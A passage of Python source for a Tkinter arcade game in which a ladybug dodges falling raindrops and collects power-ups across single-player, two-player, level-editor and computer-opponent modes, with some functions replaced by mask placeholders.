data.p1ButtonX + data.r:\n data.mode = '1Player'\n if data.p2ButtonX - data.r <= event.y <= data.p2ButtonX + data.r:\n data.mode = '2Player'\n if data.edButton - data.r <= event.y <= data.edButton + data.r:\n data.mode = 'editor'\n if data.diffButton - data.r <= event.y <= data.diffButton + data.r:\n data.mode = 'difficulty'\n if data.helpButton - data.r <= event.y <= data.helpButton + data.r:\n data.mode = 'help'\n if data.sboardButton - data.r <= event.y <= data.sboardButton + data.r:\n data.mode = 'scoreboard'\n\n\ndef splashKeyPressed(event, data):\n pass\n\n\ndef splashScreenTimerFired(data):\n data.splashScreenTime += 1\n if data.splashScreenTime % 2 == 1:\n rainDropSplash(data)\n for drop in data.splashScreenDrops:\n drop.onTimerFired(data)\n\n\ndef splashScreenButtons(canvas, data):\n canvas.create_image(data.splashButtonY, data.p1ButtonX, image=data.mode1)\n canvas.create_image(data.splashButtonY, data.p2ButtonX, image=data.mode2)\n canvas.create_image(data.splashButtonY, data.edButton, image=data.mode3)\n canvas.create_image(data.splashButtonY, data.diffButton, image=data.mode4)\n canvas.create_image(data.splashButtonY, data.helpButton, image=data.mode5)\n canvas.create_image(data.splashButtonY, data.sboardButton, image=data.mode6\n )\n\n\ndef rainDropSplash(data):\n xPosition = random.randint(0, 800)\n data.splashScreenDrops.append(Coconuts(xPosition, 0))\n\n\ndef splashScreenRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.splashText - 10, image=data.title)\n for drop in data.splashScreenDrops:\n drop.draw(canvas)\n canvas.create_text(data.width / 2, data.splashText, text=\n \"\"\"\n 1.) Single Player Level Mode\n\n\n 2.) Two-Player Mode\n\n \n 3.) Level Creator Practice Mode\n\n \n 4.) Play Against the Computer\n\n \n 5.) Help and Instructions\n\n \n 6.) Scoreboard\n\n \n \"\"\"\n , font='Arial 14 bold', fill='yellow')\n splashScreenButtons(canvas, data)\n\n\ndef writeFile(path, contents):\n with open(path, 'wt') as f:\n f.write(contents)\n\n\ndef readFile(path):\n with open(path, 'rt') as f:\n return f.read()\n\n\nclass Coconuts(object):\n\n def __init__(self, x, y):\n self.x = x\n self.y = y\n self.r = 9\n self.fill = 'deep sky blue'\n self.speed = 30\n self.outline = 'blue'\n\n def draw(self, canvas):\n canvas.create_polygon(self.x, self.y - 2 * self.r, self.x - self.r,\n self.y, self.x, self.y + self.r, self.x + self.r, self.y, fill=\n self.fill, outline=self.outline, width=3)\n\n def onTimerFired(self, data):\n self.y += self.speed\n\n\ndef hit(data):\n for coconut in data.coconuts:\n if data.mode == '1Player' or data.mode == 'levelCreated':\n if coconut.y >= data.cy - data.r and coconut.y <= data.cy + data.r:\n if (coconut.x >= data.cx - data.r and coconut.x <= data.cx +\n data.r):\n data.cy += data.hitPenalty\n if data.mode == 'levelCreated':\n data.lives -= 1\n elif data.hit == False and data.level < data.levelMax:\n data.score -= data.level\n data.coconuts.remove(coconut)\n if data.mode == 'levelCreated':\n data.levelEditorLives -= 1\n\n\ndef hit2Player(data):\n if data.mode == '2Player':\n if data.Invincible1 == False:\n for coconut in data.coconuts1:\n if (coconut.y >= data.player1Y - data.r and coconut.y <= \n data.player1Y + data.r):\n if (coconut.x >= data.player1X - data.r and coconut.x <=\n data.player1X + data.r):\n data.player1Y += data.hitPenalty\n data.coconuts1.remove(coconut)\n if data.Invincible2 == False:\n for coconut in data.coconuts2:\n if (coconut.y >= data.player2Y - data.r and coconut.y <= \n data.player2Y + data.r):\n if (coconut.x >= data.player2X - data.r and coconut.x <=\n data.player2X + data.r):\n data.player2Y += data.hitPenalty\n data.coconuts2.remove(coconut)\n\n\nclass PowerUps(Coconuts):\n\n def __init__(self, x, y):\n super().__init__(x, y)\n\n def draw(self, canvas, data):\n canvas.create_image(self.x, self.y, image=data.hourGlass)\n\n\ndef hitPause(data):\n for powerUp in data.powerUps:\n if data.mode == '1Player' or data.mode == 'levelCreated':\n if powerUp.y >= data.cy - data.r and powerUp.y <= data.cy + data.r:\n if (powerUp.x >= data.cx - data.r and powerUp.x <= data.cx +\n data.r):\n data.pauseDrops = True\n data.start = data.cy\n data.powerUps.remove(powerUp)\n elif data.mode == '2Player' or data.mode == 'AI':\n if (powerUp.y >= data.player1Y - data.r and powerUp.y <= data.\n player1Y + data.r):\n if (powerUp.x >= data.player1X - data.r and powerUp.x <= \n data.player1X + data.r):\n data.pause1Drop = True\n data.start1 = data.player1Y\n data.powerUps.remove(powerUp)\n if (powerUp.y >= data.player2Y - data.r and powerUp.y <= data.\n player2Y + data.r):\n if (powerUp.x >= data.player2X - data.r and powerUp.x <= \n data.player2X + data.r):\n data.pause2Drop = True\n data.start2 = data.player2Y\n data.powerUps.remove(powerUp)\n\n\nclass Invincible(PowerUps):\n\n def __init__(self, x, y):\n super().__init__(x, y)\n\n def draw(self, canvas, data):\n canvas.create_image(self.x, self.y, image=data.umbrella)\n\n\ndef hitInvincible(data):\n for powerUp in data.invincible:\n if data.mode == '1Player' or data.mode == 'levelCreated':\n if powerUp.y >= data.cy - data.r and powerUp.y <= data.cy + data.r:\n if (powerUp.x >= data.cx - data.r and powerUp.x <= data.cx +\n data.r):\n data.beInvincible = True\n data.start = data.cy\n data.invincible.remove(powerUp)\n if data.mode == '2Player' or data.mode == 'AI':\n if (powerUp.y >= data.player1Y - data.r and powerUp.y <= data.\n player1Y + data.r):\n if (powerUp.x >= data.player1X - data.r and powerUp.x <= \n data.player1X + data.r):\n data.Invincible1 = True\n data.start1 = data.player1Y\n data.invincible.remove(powerUp)\n if (powerUp.y >= data.player2Y - data.r and powerUp.y <= data.\n player2Y + data.r):\n if (powerUp.x >= data.player2X - data.r and powerUp.x <= \n data.player2X + data.r):\n data.Invincible2 = True\n data.start2 = data.player2Y\n data.invincible.remove(powerUp)\n\n\nclass ScaryBug(object):\n\n def __init__(self, x, y):\n self.x = x\n self.y = y\n self.speed = 25\n\n def draw(self, canvas, data):\n canvas.create_image(self.x, self.y, image=data.spider)\n\n def onTimerFired(self, data):\n if data.mode == '2Player' or data.mode == 'AI':\n self.speed = 35\n self.y -= self.speed\n if (data.mode == '1Player' or data.mode == 'levelCreated' and data.\n time % 8 == 0):\n side = random.choice(data.sides)\n if side == 'l':\n if self.x - data.lane >= data.Player1Min:\n self.x -= data.lane\n else:\n self.x += data.lane\n elif side == 'r':\n if self.x + data.lane <= data.Player1Max:\n self.x += data.lane\n else:\n self.x -= data.lane\n\n\ndef hitScaryBug(data):\n for bug in data.scaryBug:\n if data.mode == '1Player' or data.mode == 'levelCreated':\n if (bug.y >= data.cy - 1.5 * data.r and bug.y <= data.cy + 1.5 *\n data.r):\n if (bug.x >= data.cx - 1.5 * data.r and bug.x <= data.cx + \n 1.5 * data.r):\n data.hit = True\n data.lives = 0\n data.levelEditorLives = 0\n if data.mode == '2Player' or data.mode == 'AI':\n if (bug.y >= data.player1Y - data.r and bug.y <= data.player1Y +\n data.r):\n if (bug.x >= data.player1X - data.r and bug.x <= data.\n player1X + data.r):\n data.winner = 'player2'\n if (bug.y >= data.player2Y - data.r and bug.y <= data.player2Y +\n data.r):\n if (bug.x >= data.player2X - data.r and bug.x <= data.\n player2X + data.r):\n data.winner = 'player1'\n\n\ndef drawPowerups(canvas, data):\n for bug in data.scaryBug:\n bug.draw(canvas, data)\n for powerUp in data.powerUps:\n powerUp.draw(canvas, data)\n for powerUp in data.invincible:\n powerUp.draw(canvas, data)\n\n\ndef drawHome(canvas, data):\n canvas.create_image(data.homeX, data.homeY, image=data.home)\n\n\ndef checkHome(event, data):\n if data.homeY - data.r <= event.y <= data.homeY + data.r:\n if data.homeX - data.r <= event.x <= data.homeX + data.r:\n init(data)\n\n\ndef coconutShot(data):\n if data.level > 0 and data.pauseDrops == False:\n if data.time % int(data.levelMax / data.level\n ) == 0 or data.time % 6 == 0:\n xPosition1 = random.randint(0, data.Player1Min - data.buffer)\n xPosition2 = random.randint(data.Player1Max + data.buffer, data\n .width + data.buffer)\n data.coconuts.append(Coconuts(xPosition1, 0))\n data.coconuts.append(Coconuts(xPosition2, 0))\n xPosition4 = random.randint(data.Player1Min - data.buffer, data\n .Player1Max + data.buffer)\n data.coconuts.append(Coconuts(xPosition4, 0))\n if data.time % 5 == 0:\n xPosition3 = random.randint(0, data.Player1Min - data.buffer)\n data.coconuts.append(Coconuts(xPosition3, 0))\n if data.time % int(24 / data.level) == 0:\n side = random.choice(data.sides)\n if side == 'l':\n data.coconuts.append(Coconuts(data.Player1Min, 0))\n elif side == 'r':\n data.coconuts.append(Coconuts(data.Player1Max, 0))\n powerUpCoconutShot(data)\n\n\ndef powerUpCoconutShot(data):\n if data.time % 60 == 0 and data.time % 120 != 0:\n Position = random.choice(data.spotList)\n data.powerUps.append(PowerUps(Position, 0))\n if data.time % 50 == 0:\n Position = random.choice(data.spotList)\n data.invincible.append(Invincible(Position, 0))\n if data.time % 100 == 0:\n Position = random.choice(data.spotList)\n data.scaryBug.append(ScaryBug(Position, 750))\n\n\ndef playerKeyPressed(event, data):\n if data.level < data.levelMax and event.keysym == 'r':\n init(data)\n if event.keysym == 'Left' and data.cx >= data.Player1Min + data.lane / 2:\n data.cx -= data.lane / 2\n elif event.keysym == 'Right' and data.cx <= data.Player1Max:\n data.cx += data.lane / 2\n if data.level >= data.levelMax:\n if len(event.keysym) == 1:\n if len(data.name) < 15:\n data.name += event.keysym\n if event.keysym == 'BackSpace':\n data.name = data.name[0:-1]\n if event.keysym == 'Return':\n data.scoreList += data.score, data.name\n writeFile('score.txt', data.savedScores + str(data.score) + ',' +\n data.name + '\\n')\n data.mode = 'scoreboard'\n\n\n<mask token>\n\n\ndef playerRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.height / 2, image=data.background)\n canvas.create_line(0, 20, data.width, 20)\n for coconut in data.coconuts:\n coconut.draw(canvas)\n drawPowerups(canvas, data)\n canvas.create_image(data.cx, data.cy, image=data.ladyBug)\n canvas.create_text(data.width / 6, 50, text='Level: %d' % data.level,\n font='Arial 18 bold', fill='yellow')\n canvas.create_text(data.width / 6, 80, text='Score: %d' % data.score,\n font='Arial 18 bold', fill='yellow')\n canvas.create_text(2 * data.width / 3, 660, text=\n \"\"\"The greater the level, the more points get\n added to your score!\"\"\"\n , font='Arial 15 bold', fill='yellow')\n if data.hit == True:\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n deadScreen)\n canvas.create_text(data.width / 2, data.height / 4, text=\n 'You Lose! Better Luck Next Time!', font='Helvetica 23 bold',\n fill='yellow')\n canvas.create_text(data.width / 2, 280, text='Score: %d' % data.\n score, font='Arial 13 bold', fill='yellow')\n if data.level >= 8:\n madeIt(canvas, data)\n drawHome(canvas, data)\n\n\ndef madeIt(canvas, data):\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 70, text='You Made it!', font=\n 'Arial 23 bold', fill='yellow')\n canvas.create_text(data.width / 2, 100, text='Score: %d' % data.score,\n font='Arial 15 bold', fill='yellow')\n canvas.create_text(data.width / 2, 375, text=\n 'Congrats! Enter your Name!', font='Arial 15 bold', fill='yellow')\n canvas.create_rectangle(data.width / 2 - 50, 400, data.width / 2 + 50, \n 450, fill='white')\n canvas.create_text(data.width / 2, 425, text=data.name)\n\n\ndef drop2Player(data):\n if data.winner == None and data.pauseDrops == False:\n if data.time % 15 == 0:\n xPosition1 = random.randint(0, 385)\n if abs(xPosition1 - 100) > 25 and abs(xPosition1 - 360) > 25:\n if data.pause1Drop != True:\n data.coconuts1.append(Coconuts(xPosition1, 0))\n if data.pause2Drop != True:\n data.coconuts2.append(Coconuts(xPosition1 + 410, 0))\n if data.time % 12 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n if data.pause1Drop != True:\n data.coconuts1.append(Coconuts(140, 0))\n if data.pause2Drop != True:\n data.coconuts2.append(Coconuts(540, 0))\n elif side == 'r':\n if data.pause1Drop != True:\n data.coconuts1.append(Coconuts(344, 0))\n if data.pause2Drop != True:\n data.coconuts2.append(Coconuts(755, 0))\n powerupDrop2Player(data)\n\n\ndef powerupDrop2Player(data):\n if data.time % 45 == 0 and data.time % 90 != 0:\n side = random.choice(data.sides)\n if side == 'l':\n if data.pause1Drop != True:\n data.powerUps.append(PowerUps(140, 0))\n if data.pause2Drop != True:\n data.powerUps.append(PowerUps(540, 0))\n elif side == 'r':\n if data.pause1Drop != True:\n data.powerUps.append(PowerUps(344, 0))\n if data.pause2Drop != True:\n data.powerUps.append(PowerUps(755, 0))\n if data.time % 60 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n if data.pause1Drop != True:\n data.invincible.append(Invincible(140, 0))\n if data.pause2Drop != True:\n data.invincible.append(Invincible(540, 0))\n elif side == 'r':\n if data.pause1Drop != True:\n data.invincible.append(Invincible(344, 0))\n if data.pause2Drop != True:\n data.invincible.append(Invincible(755, 0))\n if data.time % 90 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n data.scaryBug.append(ScaryBug(140, 750))\n data.scaryBug.append(ScaryBug(540, 750))\n elif side == 'r':\n data.scaryBug.append(ScaryBug(344, 750))\n data.scaryBug.append(ScaryBug(755, 750))\n\n\ndef twoPlayerKeyPressed(event, data):\n if event.keysym == 'r':\n init(data)\n if data.winner == None:\n if event.keysym == 'a' and data.onLeft1 == False:\n data.onLeft1 = True\n data.player1X = 150\n if event.keysym == 'd' and data.onLeft1 == True:\n data.onLeft1 = False\n data.player1X = 330\n if event.keysym == 'Left' and data.onLeft2 == False:\n data.onLeft2 = True\n data.player2X = 550\n if event.keysym == 'Right' and data.onLeft2 == True:\n data.onLeft2 = False\n data.player2X = 750\n\n\ndef twoPlayerMousePressed(event, data):\n checkHome(event, data)\n\n\ndef twoPlayerTimerFired(data):\n if data.winner == None:\n data.player1Y -= data.speed\n if data.player1Y < 15 and data.player2Y > 15:\n data.winner = 'player1'\n if data.player1Y > 40:\n data.time += 1\n drop2Player(data)\n data.player2Y -= data.speed\n if data.player2Y < 15 and data.player1Y > 15:\n data.winner = 'player2'\n if data.player2Y > 40:\n data.time += 1\n drop2Player(data)\n if data.player1Y < 15 and data.player2Y < 15:\n data.winner = 'tie'\n for powerUp in data.powerUps:\n powerUp.onTimerFired(data)\n hitPause(data)\n for powerUp in data.invincible:\n powerUp.onTimerFired(data)\n hitInvincible(data)\n for bug in data.scaryBug:\n bug.onTimerFired(data)\n hitScaryBug(data)\n powerupTimerFired(data)\n\n\ndef powerupTimerFired(data):\n for coconut in data.coconuts1:\n if data.pause1Drop == False:\n coconut.onTimerFired(data)\n hit2Player(data)\n for coconut in data.coconuts2:\n if data.pause2Drop == False:\n coconut.onTimerFired(data)\n if data.start1 != None:\n if abs(data.start1 - data.player1Y) >= 120:\n data.pause1Drop = False\n data.Invincible1 = False\n if data.start2 != None:\n if abs(data.start2 - data.player2Y) >= 120:\n data.pause2Drop = False\n data.Invincible2 = False\n\n\ndef twoPlayerRedrawAll(canvas, data):\n canvas.create_image(data.width / 4, data.height / 2, image=data.\n halfBackground)\n canvas.create_image(3 * data.width / 4, data.height / 2, image=data.\n halfBackground)\n canvas.create_line(data.width / 2, 0, data.width / 2, data.height, width=10\n )\n canvas.create_line(0, 20, data.width, 20)\n for coconut in data.coconuts1:\n coconut.draw(canvas)\n for coconut in data.coconuts2:\n coconut.draw(canvas)\n drawPowerups(canvas, data)\n canvas.create_image(data.player1X, data.player1Y, image=data.ladyBug)\n canvas.create_image(data.player2X, data.player2Y, image=data.ladyBug)\n canvas.create_text(50, 40, text='Player 1', font='Arial 15 bold', fill=\n 'yellow')\n canvas.create_text(450, 40, text='Player 2', font='Arial 15 bold', fill\n ='yellow')\n winner(canvas, data)\n drawHome(canvas, data)\n\n\ndef winner(canvas, data):\n if data.winner == 'player1':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'You Made it! Player 1', font='Arial 23 bold', fill='yellow')\n elif data.winner == 'player2':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'You Made it! Player 2', font='Arial 23 bold', fill='yellow')\n elif data.winner == 'tie':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'Tie! You Both Made it!', font='Arial 23 bold', fill='yellow')\n\n\ndef editorKeyPressed(event, data):\n if event.keysym == 'r':\n init(data)\n\n\ndef editorMousePressed(event, data):\n checkHome(event, data)\n if data.easyY - data.r <= event.y <= data.easyY + data.r:\n if data.easyX - 2 * data.r <= event.x <= data.easyX + 2 * data.r:\n data.yourSpeed = 'slow'\n data.slow = data.click\n data.medium, data.fast = data.notClick, data.notClick\n if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:\n data.yourSpeed = 'medium'\n data.medium = data.click\n data.slow, data.fast = data.notClick, data.notClick\n if data.hardX - 2 * data.r <= event.x <= data.hardX + 2 * data.r:\n data.yourSpeed = 'fast'\n data.fast = data.click\n data.slow, data.medium = data.notClick, data.notClick\n checkMiddle(event, data)\n checkLast(event, data)\n\n\ndef checkMiddle(event, data):\n if data.medX - data.r <= event.y <= data.medX + data.r:\n if data.easyX - 2 * data.r <= event.x <= data.easyX + 2 * data.r:\n data.rainSpeed = 'drizzle'\n data.drizzle = data.click\n data.rain, data.thunderstorm = data.notClick, data.notClick\n if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:\n data.rainSpeed = 'rain'\n data.rain = data.click\n data.drizzle, data.thunderstorm = data.notClick, data.notClick\n if data.hardX - 2 * data.r <= event.x <= data.hardX + 2 * data.r:\n data.rainSpeed = 'thunderstorm'\n data.thunderstorm = data.click\n data.drizzle, data.rain = data.notClick, data.notClick\n\n\ndef checkLast(event, data):\n if data.last - data.r <= event.y <= data.last + data.r:\n if data.easyY - 2 * data.r <= event.x <= data.easyY + 2 * data.r:\n data.powerUpsEditor = True\n data.yes, data.no = data.click, data.notClick\n if data.last - 2 * data.r <= event.x <= data.last + 2 * data.r:\n data.powerUpsEditor = False\n data.no, data.yes = data.click, data.notClick\n if data.enter == data.click:\n if data.enterX - data.r <= event.y <= data.enterX + data.r:\n if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:\n data.mode = 'levelCreated'\n\n\ndef drawButtons(canvas, data):\n data.font, data.fill = 'Helvetica 13 bold', 'yellow'\n canvas.create_text(data.medX, data.YST, text='Your Speed:', font=data.\n font, fill=data.fill)\n canvas.create_image(data.easyX, data.easyY, image=data.slow)\n canvas.create_text(data.easyX, data.easyY, text='Slow', font=data.font)\n canvas.create_image(data.medX, data.easyY, image=data.medium)\n canvas.create_text(data.medX, data.easyY, text='Medium', font=data.font)\n canvas.create_image(data.hardX, data.easyY, image=data.fast)\n canvas.create_text(data.hardX, data.easyY, text='Fast', font=data.font)\n canvas.create_image(data.easyX, data.medX, image=data.drizzle)\n canvas.create_text(data.medX, data.RST, text='Rain Speed:', font=data.\n font, fill=data.fill)\n canvas.create_text(data.easyX, data.medX, text='Drizzle', font=data.font)\n canvas.create_image(data.medX, data.medX, image=data.rain)\n canvas.create_text(data.medX, data.medX, text='Rain', font=data.font)\n canvas.create_image(data.hardX, data.medX, image=data.thunderstorm)\n canvas.create_text(data.hardX, data.medX, text='Heavy', font=data.font)\n canvas.create_text(data.medX, data.PUT, text='PowerUps?', font=data.\n font, fill=data.fill)\n canvas.create_image(data.easyY, data.last, image=data.yes)\n canvas.create_text(data.easyY, data.last, text='Yes', font=data.font)\n canvas.create_image(data.last, data.last, image=data.no)\n canvas.create_text(data.last, data.last, text='No', font=data.font)\n changeEnter(canvas, data)\n\n\ndef changeEnter(canvas, data):\n if (data.powerUpsEditor != None and data.yourSpeed != None and data.\n rainSpeed != None):\n data.enter = data.click\n canvas.create_image(data.medX, data.enterX, image=data.enter)\n canvas.create_text(data.medX, data.enterX, text='Enter', font=data.font)\n\n\ndef editorTimerFired(data):\n data.editorTime += 1\n if data.editorTime % 2 == 0:\n rainDrop(data)\n for drop in data.editorDrops:\n drop.onTimerFired(data)\n\n\ndef rainDrop(data):\n xPosition = random.randint(0, data.width)\n data.editorDrops.append(Coconuts(xPosition, 0))\n\n\ndef editorRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.height / 2, image=data.background)\n canvas.create_image(data.width / 2, data.height / 2, image=data.tbg)\n for drop in data.editorDrops:\n drop.draw(canvas)\n canvas.create_text(data.width / 2, data.S_P - 10, text=\n 'Edit Your Level!', font='Arial 23 bold', fill='yellow')\n drawButtons(canvas, data)\n drawHome(canvas, data)\n\n\ndef setEverything(data):\n if data.yourSpeed == 'slow':\n data.speed = 6\n elif data.yourSpeed == 'medium':\n data.speed = 10\n elif data.yourSpeed == 'fast':\n data.speed = 14\n if data.rainSpeed == 'thunderstorm':\n data.rSpeed = 7\n elif data.rainSpeed == 'rain':\n data.rSpeed = 10\n elif data.rainSpeed == 'drizzle':\n data.rSpeed = 13\n\n\n<mask token>\n\n\ndef levelPowerUp(data):\n if data.powerUpsEditor == True:\n if data.time % 20 == 0 and data.time % 40 != 0:\n Position = random.choice(data.spotList)\n data.powerUps.append(PowerUps(Position, 0))\n if data.time % 30 == 0:\n Position = random.choice(data.spotList)\n data.invincible.append(Invincible(Position, 0))\n if data.time % 35 == 0:\n Position = random.choice(data.spotList)\n data.scaryBug.append(ScaryBug(Position, 750))\n\n\n<mask token>\n\n\ndef levelCreatedMousePressed(event, data):\n checkHome(event, data)\n\n\ndef levelCreatedTimerFired(data):\n setEverything(data)\n if data.levelEditorLives > 0:\n data.cy -= data.speed\n if data.cy < 15:\n data.level += 1\n if data.cy > 40:\n data.time += 1\n if data.pauseDrops != True:\n levelCoconutShot(data)\n if data.powerUpsEditor == False:\n for coconut in data.coconuts:\n coconut.onTimerFired(data)\n hit(data)\n if data.powerUpsEditor == True:\n for powerUp in data.powerUps:\n powerUp.onTimerFired(data)\n hitPause(data)\n for powerUp in data.invincible:\n powerUp.onTimerFired(data)\n hitInvincible(data)\n for bug in data.scaryBug:\n bug.onTimerFired(data)\n hitScaryBug(data)\n for coconut in data.coconuts:\n if data.pauseDrops == False:\n coconut.onTimerFired(data)\n if data.beInvincible == False:\n hit(data)\n if data.start != None:\n if abs(data.start - data.cy) >= 120:\n data.pauseDrops, data.beInvincible = False, False\n\n\ndef levelCreatedRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.height / 2, image=data.background)\n canvas.create_line(0, 20, data.width, 20)\n for coconut in data.coconuts:\n coconut.draw(canvas)\n if data.powerUpsEditor == True:\n drawPowerups(canvas, data)\n canvas.create_image(data.cx, data.cy, image=data.ladyBug)\n canvas.create_text(data.width / 6, 100, text='Total Lives: %d' % data.\n levelEditorLives, font='Arial 20 bold', fill='yellow')\n canvas.create_text(data.width / 2, 660, text=\n \"\"\"You lose a life for hitting a drop\n & don't get eaten!\"\"\",\n font='Arial 15 bold', fill='yellow')\n if data.levelEditorLives <= 0:\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n deadScreen)\n canvas.create_text(data.width / 2, data.height / 4, text=\n 'You Lose! Better Luck Next Time!', font='Helvetica 23 bold',\n fill='yellow')\n if data.level > 1:\n winEditor(canvas, data)\n drawHome(canvas, data)\n\n\ndef winEditor(canvas, data):\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text='You Made it!', font=\n 'Arial 23 bold', fill='yellow')\n\n\n<mask token>\n\n\ndef drawDifficulties(canvas, data):\n canvas.create_text(data.medX, data.AITY, text='Computer Difficulty:',\n font='Arial 23 bold', fill='yellow')\n canvas.create_image(data.easyX, data.easyY, image=data.slow)\n canvas.create_text(data.easyX, data.easyY, text='Easy')\n canvas.create_image(data.medX, data.easyY, image=data.medium)\n canvas.create_text(data.medX, data.easyY, text='Medium')\n canvas.create_image(data.hardX, data.easyY, image=data.fast)\n canvas.create_text(data.hardX, data.easyY, text='Hard')\n if data.difficulty != None:\n data.enter = data.click\n canvas.create_image(data.medX, data.enterY, image=data.enter)\n canvas.create_text(data.medX, data.enterY, text='Enter')\n\n\ndef difficultyMousePressed(event, data):\n checkHome(event, data)\n if data.easyY - data.r <= event.y <= data.easyY + data.r:\n if data.easyX - 2 * data.r <= event.x <= data.easyX + 2 * data.r:\n data.difficulty = data.difS\n data.slow = data.click\n data.medium, data.fast = data.notClick, data.notClick\n if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:\n data.difficulty = data.difM\n data.medium = data.click\n data.slow, data.fast = data.notClick, data.notClick\n if data.hardX - 2 * data.r <= event.x <= data.hardX + 2 * data.r:\n data.difficulty = data.difH\n data.fast = data.click\n data.slow, data.medium = data.notClick, data.notClick\n if data.enter == data.click:\n if data.enterY - data.r <= event.y <= data.enterY + data.r:\n if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:\n data.mode = 'AI'\n\n\ndef difficultyTimerFired(data):\n data.editorTime += 1\n if data.editorTime % 2 == 0:\n rainDrop(data)\n for drop in data.editorDrops:\n drop.onTimerFired(data)\n\n\ndef rainDrop(data):\n xPosition = random.randint(0, data.width)\n data.editorDrops.append(Coconuts(xPosition, 0))\n\n\ndef difficultyRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.height / 2, image=data.background)\n canvas.create_image(data.width / 2, data.height / 2, image=data.tbg)\n for drop in data.editorDrops:\n drop.draw(canvas)\n drawDifficulties(canvas, data)\n drawHome(canvas, data)\n\n\ndef hitAI1(data, distance):\n for coconut in data.coconutsAI1:\n if (data.player1Y - data.r - coconut.y <= distance and data.\n switchOnProgress == False):\n if (coconut.x >= data.player1X - data.r and coconut.x <= data.\n player1X + data.r or AISwitchBug(data, distance) == True):\n testInt = random.randint(0, 9)\n if testInt <= data.difficulty:\n data.switchOnProgress = True\n if data.player1X == 150:\n data.player1X = 340\n else:\n data.player1X = 150\n data.switchOnProgress = False\n if (coconut.y >= data.player1Y - data.r and coconut.y <= data.\n player1Y + data.r):\n if (coconut.x >= data.player1X - data.r and coconut.x <= data.\n player1X + data.r):\n data.player1Y += 50\n data.coconutsAI1.remove(coconut)\n\n\ndef AISwitchBug(data, distance):\n for scaryBug in data.scaryBug:\n if (data.player1Y - data.r - scaryBug.y <= distance and data.\n switchOnProgress == False):\n if (scaryBug.x >= data.player1X - data.r and scaryBug.x <= data\n .player1X + data.r):\n return True\n\n\ndef hitAI2(data, distance):\n for coconut in data.coconutsAI2:\n if (coconut.y >= data.player2Y - data.r and coconut.y <= data.\n player2Y + data.r):\n if (coconut.x >= data.player2X - data.r and coconut.x <= data.\n player2X + data.r):\n data.player2Y += 50\n data.coconutsAI2.remove(coconut)\n\n\ndef coconutShotAI(data):\n if data.winner == None:\n if data.time % 15 == 0:\n xPosition1 = random.randint(0, 385)\n if abs(xPosition1 - 100) > 40 and abs(xPosition1 - 360) > 40:\n if data.pause1Drop != True:\n data.coconutsAI1.append(Coconuts(xPosition1, 0))\n if data.pause2Drop != True:\n data.coconutsAI2.append(Coconuts(xPosition1 + 410, 0))\n if data.time % 8 == 0:\n xPosition2 = random.randint(0, 80)\n xPosition3 = random.randint(364, 385)\n if data.pause1Drop != True:\n data.coconutsAI1.append(Coconuts(xPosition2, 0))\n data.coconutsAI1.append(Coconuts(xPosition3, 0))\n if data.pause2Drop != True:\n data.coconutsAI2.append(Coconuts(xPosition2 + 410, 0))\n data.coconutsAI2.append(Coconuts(xPosition3 + 410, 0))\n addExtraCoconut(data)\n addPowerUpsAI(data)\n\n\ndef addExtraCoconut(data):\n if data.time % 18 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n if data.pause1Drop != True:\n data.coconutsAI1.append(Coconuts(140, 0))\n if data.pause2Drop != True:\n data.coconutsAI2.append(Coconuts(540, 0))\n elif side == 'r':\n if data.pause1Drop != True:\n data.coconutsAI1.append(Coconuts(344, 0))\n if data.pause2Drop != True:\n data.coconutsAI2.append(Coconuts(755, 0))\n if data.time % 37 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n if data.pause1Drop != True:\n data.powerUps.append(PowerUps(140, 0))\n if data.pause2Drop != True:\n data.powerUps.append(PowerUps(550, 0))\n elif side == 'r':\n if data.pause1Drop != True:\n data.powerUps.append(PowerUps(344, 0))\n if data.pause2Drop != True:\n data.powerUps.append(PowerUps(755, 0))\n\n\ndef addPowerUpsAI(data):\n if data.time % 33 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n if data.pause1Drop != True:\n data.invincible.append(Invincible(140, 0))\n if data.pause2Drop != True:\n data.invincible.append(Invincible(550, 0))\n elif side == 'r':\n if data.pause1Drop != True:\n data.invincible.append(Invincible(344, 0))\n if data.pause2Drop != True:\n data.invincible.append(Invincible(755, 0))\n if data.time % 66 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n data.scaryBug.append(ScaryBug(140, 750))\n data.scaryBug.append(ScaryBug(550, 750))\n elif side == 'r':\n data.scaryBug.append(ScaryBug(344, 750))\n data.scaryBug.append(ScaryBug(750, 750))\n\n\ndef AIKeyPressed(event, data):\n if event.keysym == 'r':\n init(data)\n if data.winner == None:\n if 